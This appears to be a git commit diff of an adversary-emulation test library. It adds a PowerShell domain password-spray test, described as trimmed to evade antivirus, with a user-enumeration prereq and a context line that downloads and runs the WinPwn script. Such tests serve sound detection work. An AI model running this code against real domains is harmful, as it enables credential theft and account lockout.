Generated docs from job=generate-docs branch=master [ci skip]

2022-05-19 23:05:53 +00:00
parent 7846e9770a
commit 9e8bb918d5
6 changed files with 135 additions and 0 deletions
@@ -115,6 +115,7 @@ credential-access,T1110.003,Password Spraying,2,Password Spray (DomainPasswordSp
 credential-access,T1110.003,Password Spraying,3,Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos),f14d956a-5b6e-4a93-847f-0c415142f07d,powershell
 credential-access,T1110.003,Password Spraying,4,Password spray all Azure AD users with a single password,a8aa2d3e-1c52-4016-bc73-0f8854cfa80a,powershell
 credential-access,T1110.003,Password Spraying,5,WinPwn - DomainPasswordSpray Attacks,5ccf4bbd-7bf6-43fc-83ac-d9e38aff1d82,powershell
+credential-access,T1110.003,Password Spraying,6,Password Spray Invoke-DomainPasswordSpray Light,b15bc9a5-a4f3-4879-9304-ea0011ace63a,powershell
 credential-access,T1556.003,Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
 credential-access,T1556.003,Pluggable Authentication Modules,2,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
 credential-access,T1552.004,Private Keys,1,Private Keys,520ce462-7ca7-441e-b5a5-f8347f632696,command_prompt
@@ -87,6 +87,7 @@ credential-access,T1110.003,Password Spraying,1,Password Spray all Domain Users,
 credential-access,T1110.003,Password Spraying,2,Password Spray (DomainPasswordSpray),263ae743-515f-4786-ac7d-41ef3a0d4b2b,powershell
 credential-access,T1110.003,Password Spraying,3,Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos),f14d956a-5b6e-4a93-847f-0c415142f07d,powershell
 credential-access,T1110.003,Password Spraying,5,WinPwn - DomainPasswordSpray Attacks,5ccf4bbd-7bf6-43fc-83ac-d9e38aff1d82,powershell
+credential-access,T1110.003,Password Spraying,6,Password Spray Invoke-DomainPasswordSpray Light,b15bc9a5-a4f3-4879-9304-ea0011ace63a,powershell
 credential-access,T1552.004,Private Keys,1,Private Keys,520ce462-7ca7-441e-b5a5-f8347f632696,command_prompt
 credential-access,T1552.004,Private Keys,6,ADFS token signing and encryption certificates theft - Local,78e95057-d429-4e66-8f82-0f060c1ac96f,powershell
 credential-access,T1552.004,Private Keys,7,ADFS token signing and encryption certificates theft - Remote,cab413d8-9e4a-4b8d-9b84-c985bd73a442,powershell
@@ -156,6 +156,7 @@
  - Atomic Test #3: Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos) [windows]
  - Atomic Test #4: Password spray all Azure AD users with a single password [azure-ad]
  - Atomic Test #5: WinPwn - DomainPasswordSpray Attacks [windows]
+  - Atomic Test #6: Password Spray Invoke-DomainPasswordSpray Light [windows]
 - [T1556.003 Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
  - Atomic Test #1: Malicious PAM rule [linux]
  - Atomic Test #2: Malicious PAM module [linux]
@@ -122,6 +122,7 @@
  - Atomic Test #2: Password Spray (DomainPasswordSpray) [windows]
  - Atomic Test #3: Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos) [windows]
  - Atomic Test #5: WinPwn - DomainPasswordSpray Attacks [windows]
+  - Atomic Test #6: Password Spray Invoke-DomainPasswordSpray Light [windows]
 - [T1552.004 Private Keys](../../T1552.004/T1552.004.md)
  - Atomic Test #1: Private Keys [windows]
  - Atomic Test #6: ADFS token signing and encryption certificates theft - Local [windows]
@@ -6160,6 +6160,60 @@ credential-access:
          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
          domainpassspray -consoleoutput -noninteractive -emptypasswords
        name: powershell
+    - name: Password Spray Invoke-DomainPasswordSpray Light
+      auto_generated_guid: b15bc9a5-a4f3-4879-9304-ea0011ace63a
+      description: "Perform a domain password spray using the same core method of
+        the [DomainPasswordSpray tool](https://github.com/dafthack/DomainPasswordSpray)
+        \nbut without all the extra code that makes the script get blocked by many
+        AVs. \nThis atomic test will attempt a single password against all users in
+        a password list at $env:Temp\\usersdpsLight.txt. You can create this file
+        manually\nor with the automated prereq_command. The prereq_command will limit
+        the user list to 200 users by default to help you avoid massive account lockout.\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        user_limit:
+          description: The max number of users to put in the list when running the
+            prereq_command
+          type: Integer
+          default: 200
+        password:
+          description: The password to try for each user in users.txt
+          type: String
+          default: Spring2020
+      dependencies:
+      - description: 'Username file must exist at $env:Temp\usersdpsLight.txt
+
+          '
+        prereq_command: 'if (Test-Path  $env:Temp\usersdpsLight.txt) {exit 0} else
+          {exit 1}
+
+          '
+        get_prereq_command: "Write-Host -NoNewLine \"Reading Users.\" # this code
+          modifed from https://github.com/ZoomerHulkHogan/Powershell-Domain-User-Enumeration\n$netOutput
+          = net users /domain\n$netOutput = [System.Collections.ArrayList]($netOutput[6..($netOutput.length-3)])\n$userLimit
+          = #{user_limit}; $usercount = 0\nforeach ($line in $netOutput) {\n  if($usercount
+          -ge $userLimit){break}\n  $line = $line.trim()\n  $line = $line -split '\\s\\s+'\n
+          \ foreach ($user in $line){\n    if($usercount -ge $userLimit){break}\n
+          \   Add-Content $env:Temp\\usersdpsLight.txt $user\n    $usercount = $usercount
+          + 1\n    }  \n}\nWrite-Host \"Usernames saved to $env:Temp\\usersdpsLight.txt\"\n"
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          function Invoke-dpsLight ($Password, $userlist) {
+          $users = Get-Content $userlist
+          $Domain = "LDAP://" + ([ADSI]"").distinguishedName
+          foreach ($User in $users) {
+            $Domain_check = New-Object System.DirectoryServices.DirectoryEntry($Domain, $User, $Password)
+            if ($Domain_check.name -ne $null) {
+              Write-Host -ForegroundColor Green "Password found for User:$User Password:$Password"
+            }
+            else { Write-Host ". " -NoNewline}
+          }
+          Write-Host -ForegroundColor green "Finished"
+          }
+          Invoke-dpsLight "#{password}" $env:Temp\usersdpsLight.txt
  T1556.003:
    technique:
      object_marking_refs:
@@ -33,6 +33,8 @@ In default environments, LDAP and Kerberos connection attempts are less likely t

 - [Atomic Test #5 - WinPwn - DomainPasswordSpray Attacks](#atomic-test-5---winpwn---domainpasswordspray-attacks)

+- [Atomic Test #6 - Password Spray Invoke-DomainPasswordSpray Light](#atomic-test-6---password-spray-invoke-domainpasswordspray-light)
+

 <br/>

@@ -279,4 +281,79 @@ domainpassspray -consoleoutput -noninteractive -emptypasswords



+<br/>
+<br/>
+
+## Atomic Test #6 - Password Spray Invoke-DomainPasswordSpray Light
+Perform a domain password spray using the same core method of the [DomainPasswordSpray tool](https://github.com/dafthack/DomainPasswordSpray) 
+but without all the extra code that makes the script get blocked by many AVs. 
+This atomic test will attempt a single password against all users in a password list at $env:Temp\usersdpsLight.txt. You can create this file manually
+or with the automated prereq_command. The prereq_command will limit the user list to 200 users by default to help you avoid massive account lockout.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** b15bc9a5-a4f3-4879-9304-ea0011ace63a
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| user_limit | The max number of users to put in the list when running the prereq_command | Integer | 200|
+| password | The password to try for each user in users.txt | String | Spring2020|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+function Invoke-dpsLight ($Password, $userlist) {
+$users = Get-Content $userlist
+$Domain = "LDAP://" + ([ADSI]"").distinguishedName
+foreach ($User in $users) {
+  $Domain_check = New-Object System.DirectoryServices.DirectoryEntry($Domain, $User, $Password)
+  if ($Domain_check.name -ne $null) {
+    Write-Host -ForegroundColor Green "Password found for User:$User Password:$Password"
+  }
+  else { Write-Host ". " -NoNewline}
+}
+Write-Host -ForegroundColor green "Finished"
+}
+Invoke-dpsLight "#{password}" $env:Temp\usersdpsLight.txt
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Username file must exist at $env:Temp\usersdpsLight.txt
+##### Check Prereq Commands:
+```powershell
+if (Test-Path  $env:Temp\usersdpsLight.txt) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host -NoNewLine "Reading Users." # this code modifed from https://github.com/ZoomerHulkHogan/Powershell-Domain-User-Enumeration
+$netOutput = net users /domain
+$netOutput = [System.Collections.ArrayList]($netOutput[6..($netOutput.length-3)])
+$userLimit = #{user_limit}; $usercount = 0
+foreach ($line in $netOutput) {
+  if($usercount -ge $userLimit){break}
+  $line = $line.trim()
+  $line = $line -split '\s\s+'
+  foreach ($user in $line){
+    if($usercount -ge $userLimit){break}
+    Add-Content $env:Temp\usersdpsLight.txt $user
+    $usercount = $usercount + 1
+    }  
+}
+Write-Host "Usernames saved to $env:Temp\usersdpsLight.txt"
+```
+
+
+
+
 <br/>